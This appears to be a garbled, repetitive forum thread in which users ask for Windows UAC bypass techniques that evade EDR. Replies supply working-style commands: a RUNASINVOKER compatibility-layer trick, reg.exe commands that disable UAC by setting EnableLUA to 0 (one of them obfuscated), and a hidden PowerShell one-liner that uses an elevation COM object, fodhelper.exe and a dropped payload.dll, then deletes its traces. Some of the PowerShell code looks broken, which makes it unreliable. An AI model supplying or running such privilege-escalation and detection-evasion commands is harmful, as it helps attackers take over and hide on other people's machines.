Is there currently any LOLBAS for uac bypass not monitored by windows EDR?
Uhh I was trying with eventvwr, but it Stills popping up UAC screen and sometimes event EDR kills the shift due to bad behaviorwhat was the last ?
Hey, it looks simple, try this.Is there currently any LOLBAS for uac bypass not monitored by windows EDR?
start "" /b cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && Example.exe"

setlocal enabledelayedexpansion & set "__COMPAT_LAYER=RUNASINVOKER" & start "" /min cmd /C "setlocal enabledelayedexpansion ^& (echo ^^^!__COMPAT_LAYER^^^! ^& start "" /min Example.exe)"
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

setlocal enabledelayedexpansion & set "command=reg.exe" & set "args=ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f" & set "cmd=!command! !args!" & cmd /V /C "!cmd!"
Uhh I was trying with eventvwr, but it Stills popping up UAC screen and sometimes event EDR kills the shift due to bad behavior
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& { $clsid='Elevation:Administrator!new:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}'; $fod='fodhelper.exe'; $tmpDir='$env:TEMP\'+[System.Guid]::NewGuid().ToString(); if (-not(Test-Path $tmpDir)) { New-Item -Path $tmpDir -ItemType Directory | Out-Null }; $payload='$tmpDir\payload.dll'; (New-Object -ComObject $clsid).SaveDirectoryAsCab($payload, '$env:SystemRoot\System32\wow64log.dll'); Start-Process $fod -ArgumentList ('/c ' + $payload) -NoNewWindow; Start-Sleep -s 2; Remove-Item -Path $payload -Force; Remove-Item -Path $tmpDir -Recurse -Force; }"
In the context of our UAC bypass, the linecan you add more about :$payload='$tmpDir\payload.dll'
$payload='$tmpDir\payload.dll'
